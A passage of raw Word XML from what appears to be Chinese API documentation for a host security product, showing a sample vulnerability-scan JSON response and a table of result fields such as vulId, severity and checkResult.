        <w:br/>
        <w:t xml:space="preserve">            "category": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "condition": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appVersion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "bash＜4.3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pocCheckResults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>executeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>executeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "d27260c9bb52d82c",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.184",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.184",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.184",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yongliang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "charts": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A6EB5B"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910"/>
        <w:gridCol w:w="1071"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5556"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="62326F6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F9FE93D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54C38148" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B4382DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18006514" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6EB6994E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43E9AD85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76B2A9FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F307DF1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="425C6C61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险id（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="57AB64B0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E243DE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F675E11" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B90B753" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39D5BC73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险名（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="727A1370" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="654296C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="469ECD72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="553C6C00" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A0810D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>影响的应用（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3539304D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5048B702" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>desc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10A1A35E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2405063F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4096)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FCD6218" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23AF178C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DFEBDEE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>restartOpts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60C949FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2528A344" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="230C2333" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修复影响：0-未知；1-无需重启；2-服务重启；3系统重启 （仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="26A96044" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F271C4C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>publicDate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A753931" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E2005BD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D88DD95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>发布时间（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3F2407F2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ADEE0F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>firstCheckTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6368B8B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43836101" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="222D4E5D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>首次检测时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="198C25B2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6451B7A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DFFCC0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4943D9A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B01A7B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险类型，对于漏洞检测固定为4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="501A2564" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="308EEE10" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="764FB1D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A65FFEF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66185FA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>危险程度：0-信息；1-低危；2-中危；3-高危；4-危急 ）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1812E312" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16194F1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>checkInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63FCC095" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7275050B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E4F6CF0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>验证信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="669FCCE0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="279DDFA4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pocCheckInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E994F99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A8F8331" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EA8A3C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>POC检测信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4EA69445" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B83A770" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>checkResult</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24BB230B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A3C2F0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31E58EDD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>验证结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="686E76F5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6792E8B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09F5AF09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3148B2DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D023314" w14:textId="562F0BD3" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>详情，见</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "附录2-windows后门检测-查询结果-data数据结构" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
